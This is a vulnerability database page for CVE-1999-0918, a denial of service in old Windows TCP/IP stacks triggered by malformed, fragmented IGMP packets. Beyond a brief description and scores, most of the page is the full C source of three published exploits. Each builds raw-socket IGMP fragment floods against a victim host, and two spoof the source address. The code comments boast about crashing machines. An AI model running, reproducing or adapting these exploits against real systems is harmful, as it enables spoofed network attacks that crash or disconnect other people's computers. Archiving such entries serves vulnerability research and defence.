CVE-1999-0918 : Detail

CVE-1999-0918

A03-Injection
0.43%V3
Network
2000-01-04
04h00 +00:00
2024-08-01
16h55 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Denial of service in various Windows systems via malformed, fragmented IGMP packets.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.8 AV:N/AC:L/Au:N/C:N/I:N/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 19413

Publication date : 1999-07-02 22h00 +00:00
Author : Coolio
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/514/info The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably tolerate malformed IGMP headers. When one is received, the stack will sometimes fail with unpredictable results ranging from a Blue Screen to instantaneous reboot. /*** Kox by Coolio ([email protected]) this was a successful attempt to duplicate klepto/defile's kod win98 exploit and add spoofing support to it. me and defile made this a race to see who could do spoofing kod first. he won. (mine's better!) my kox and defile's skod output about the same packets but he had skod working a few hours before i had kox working. affected systems: windows 98, windows 98 SE, windows 2000 build 2000 results: bluescreen, tcp/ip stack failure, lockup, or instant reboot thanks to klepto and defile for making kod, psilord for wanting to understand what we were doing, greg for telling me about iphdr.ihl, mancide for letting me use his win98 boxen to test on, and the few other people i crashed trying to get this working right. also thanks to the authors of elvis for making such a badass editor. ***/ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <netdb.h> #include <string.h> #include <errno.h> #include <pwd.h> #include <time.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/utsname.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <netinet/igmp.h> void usage(char *arg) { printf("Kox by Coolio ([email protected])\n"); printf("Usage: %s <victim>\n", arg); exit(1); } unsigned int randip() { struct hostent *he; struct sockaddr_in sin; char *buf = (char *)calloc(1, sizeof(char) * 16); sprintf(buf, "%d.%d.%d.%d", (random()%191)+23, (random()%253)+1, (random()%253)+1, (random()%253)+1); inet_aton(buf, (struct in_addr *)&sin); return sin.sin_addr.s_addr; } unsigned short in_cksum(unsigned short *buh, int len) { register long sum = 0; unsigned short oddbyte; register unsigned short answer; while(len > 1) { sum += *buh++; len -= 2; } if(len == 1) { oddbyte = 0; *((unsigned char *)&oddbyte) = *(unsigned char *)buh; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xFFFF); sum += (sum >> 16); answer = ~sum; return answer; } int nuke_igmp(struct sockaddr_in *victim, unsigned long spoof) { int BIGIGMP = 1500; unsigned char *pkt; struct iphdr *ip; struct igmphdr *igmp; struct utsname *un; struct passwd *p; int i, s; int id = (random() % 40000) + 500; pkt = (unsigned char *)calloc(1, BIGIGMP); ip = (struct iphdr *)pkt; igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr)); ip->version = 4; ip->ihl = (sizeof *ip) / 4; ip->ttl = 255; ip->tot_len = htons(BIGIGMP); ip->protocol = IPPROTO_IGMP; ip->id = htons(id); ip->frag_off = htons(IP_MF); ip->saddr = spoof; ip->daddr = victim->sin_addr.s_addr; ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr)); igmp->type = 0; igmp->group = 0; igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr)); for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1; i < BIGIGMP; i++) pkt[i] = random() % 255; #ifndef I_GROK un = (struct utsname *)(pkt + sizeof(struct iphdr) + sizeof(struct igmphdr) + 40); uname(un); p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10); memcpy(p, getpwuid(getuid()), sizeof(struct passwd)); #endif if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("error: socket()"); return 1; } if(sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in)) == -1) { perror("error: sendto()"); return 1; } usleep(1000000); for(i = 1; i < 5; i++) { if(i > 3) ip->frag_off = htons(((BIGIGMP-20) * i) >> 3); else ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF); sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in)); usleep(2000000); } free(pkt); close(s); return 0; } int main(int argc, char *argv[]) { struct sockaddr_in victim; struct hostent *he; int i; srandom(time(NULL)); if(argc < 2) usage(argv[0]); if((he = gethostbyname(argv[1])) == NULL) { herror(argv[1]); exit(1); } memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length); victim.sin_port = htons(0); victim.sin_family = PF_INET; printf("IGMP> "); fflush(stdout); for(i = 0; i < 10; i++) { nuke_igmp(&victim, randip()); printf("."); fflush(stdout); } printf("\n"); fflush(stdout); }
Exploit Database EDB-ID : 19414

Publication date : 1999-07-02 22h00 +00:00
Author : klepto
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/514/info The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably tolerate malformed IGMP headers. When one is received, the stack will sometimes fail with unpredictable results ranging from a Blue Screen to instantaneous reboot. /* ::: kod.c (kiss of death) version 1.2 ::: [author] kod.c bug found by klepto / [email protected] / rewritten by ignitor / ignitor@EFnet ::: [stuph ] works on bsd/linux/*nix ::: [notes ] bluescreens windows users(98/98se) and kills tcp stack ::: [m$ bug] windows handles igmp badly and this is the result ::: [greets] amputee/nizda/nyt/ignitor/skyline/codelogic/ill`/conio/egotr ip/TFreak/napster ::: [greets] dist(test monkey)/naz(you rule period.)/#havok/ #irc_addict/#kgb/#eof/everyone ::: [action] ./kod <host> and BEWM! ::: [rant ] there will be lots of rewrites to this.. just get our name right! de omnibus dubitandum */ /* windows core dump output (*whee*) An exception 0E has occurred at 0028:C14C9212 in VxD VIP (01) + 00006C72. This was called from 0028:C183FF54 in VcD PPPMAC (04) + 000079BR. It may be possible to continue normally(*not*). */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <netinet/in.h> #include <netdb.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #include <unistd.h> struct iphdr { unsigned char ihl:4, version:4, tos; unsigned short tot_len, id, frag_off; unsigned char ttl, protocol; unsigned short check; unsigned int saddr, daddr; }; struct igmphdr { unsigned char type, code; unsigned short cksum; struct in_addr group; }; unsigned short in_chksum(unsigned short *, int); long resolve(char *); long resolve(char *host) { struct hostent *hst; long addr; hst = gethostbyname(host); if (hst == NULL) return(-1); memcpy(&addr, hst->h_addr, hst->h_length); return(addr); } int main(int argc, char *argv[]) { struct sockaddr_in dst; struct iphdr *ip; struct igmphdr *igmp; long daddr, saddr; int s, i=0, c, len; char buf[1500]; if (argc < 3) { printf("KOD spoofer by Ignitor and klepto\n"); printf("Usage: %s <src> <dst>\n", *argv); return(1); } daddr = resolve(argv[2]); saddr = resolve(argv[1]); memset(buf, 0, 1500); ip = (struct iphdr *)&buf; igmp = (struct igmphdr *)&buf[sizeof(struct iphdr)]; dst.sin_addr.s_addr = daddr; dst.sin_family = AF_INET; ip->ihl = 5; ip->version = 4; ip->tos = 0; ip->tot_len = htons(10933); ip->id = htons(48648); ip->ttl = 64; ip->protocol = IPPROTO_IGMP; ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr)); ip->saddr = saddr; ip->daddr = daddr; s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (s == -1) return(1); printf("Sending IGMP packets: %s -> %s\n", argv[1], argv [2]); for (c=0;c<2;c++) { len = 220; ip->frag_off = htons(0x73a); for (i=0;;i++) { if (sendto(s,&buf,len,0,(struct sockaddr *)&dst,sizeof (struct sockaddr_in)) == -1) { perror("Error sending packet"); exit(-1); } if (ntohs(ip->frag_off) == 0x2000) break; len = 1500; if (!i) ip->frag_off = htons(0x2681); else ip->frag_off = htons(ntohs(ip->frag_off) - 185); ip->check = in_chksum((unsigned short *)ip, sizeof (struct iphdr)); } } return(1); } unsigned short in_chksum(unsigned short *addr, int len) { register int nleft = len; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *addr++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)addr; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); }
Exploit Database EDB-ID : 19415

Publication date : 1999-04-05 22h00 +00:00
Author : Rob Mosher
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/514/info The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably tolerate malformed IGMP headers. When one is received, the stack will sometimes fail with unpredictable results ranging from a Blue Screen to instantaneous reboot. /* ** pimp.c 6/4/99 by Rob Mosher: [email protected] ** exploits bug in m$'s ip stack ** rewrite by nyt@EFnet ** bug found by klepto ** usage: pimp <host> */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <time.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <sys/socket.h> struct igmp { unsigned char igmp_type; unsigned char igmp_code; unsigned short igmp_cksum; struct in_addr igmp_group; }; #define ERROR(a) {printf("ERROR: %s\n", a);exit(-1);} u_long resolve(char *); int main(int argc, char *argv[]) { int nsock, ctr; char *pkt, *data; struct ip *nip; struct igmp *nigmp; struct sockaddr_in s_addr_in; setvbuf(stdout, NULL, _IONBF, 0); printf("pimp.c by nyt\n"); if(argc != 2) ERROR("usage: pimp <host>"); if((nsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) ERROR("could not create raw socket"); pkt = malloc(1500); if(!pkt) ERROR("could not allocate memory"); memset(&s_addr_in, 0, sizeof(s_addr_in)); memset(pkt, 0, 1500); nip = (struct ip *) pkt; nigmp = (struct igmp *) (pkt + sizeof(struct ip)); data = (char *)(pkt + sizeof(struct ip) + sizeof(struct igmp)); memset(data, 'A', 1500-(sizeof(struct ip) + sizeof(struct igmp))); s_addr_in.sin_addr.s_addr = resolve(argv[1]); nip->ip_v = 4; nip->ip_hl = 5; nip->ip_tos = 0; nip->ip_id = 69; nip->ip_ttl = 255; nip->ip_p = IPPROTO_IGMP; nip->ip_sum = 0; nip->ip_dst.s_addr = s_addr_in.sin_addr.s_addr; nip->ip_src.s_addr = 2147100000; nigmp->igmp_type = 2; nigmp->igmp_code = 31; nigmp->igmp_cksum = 0; inet_aton("128.1.1.1", &nigmp->igmp_group); printf("pimpin' dem trick-ass-bitches"); for(ctr = 0;ctr < 15;ctr++) { printf("."); nip->ip_len = 1500; nip->ip_off = htons(IP_MF); sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_off = htons(1480/8)|htons(IP_MF); sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_off = htons(5920/8)|htons(IP_MF); sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_len = 831; nip->ip_off = htons(7400/8); sendto(nsock, pkt, 831, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); usleep(500000); } printf("*slap* *slap* bitch, who yo daddy\n"); shutdown(nsock, 2); close(nsock); } u_long resolve(char *host) { struct hostent *he; u_long ret; if(!(he = gethostbyname(host))) { herror("gethostbyname()"); exit(-1); } memcpy(&ret, he->h_addr, sizeof(he->h_addr)); return ret; }

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_95 >> Version *

Microsoft>>Windows_98 >> Version *

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

References

http://www.securityfocus.com/bid/514
Tags : vdb-entry, x_refsource_BID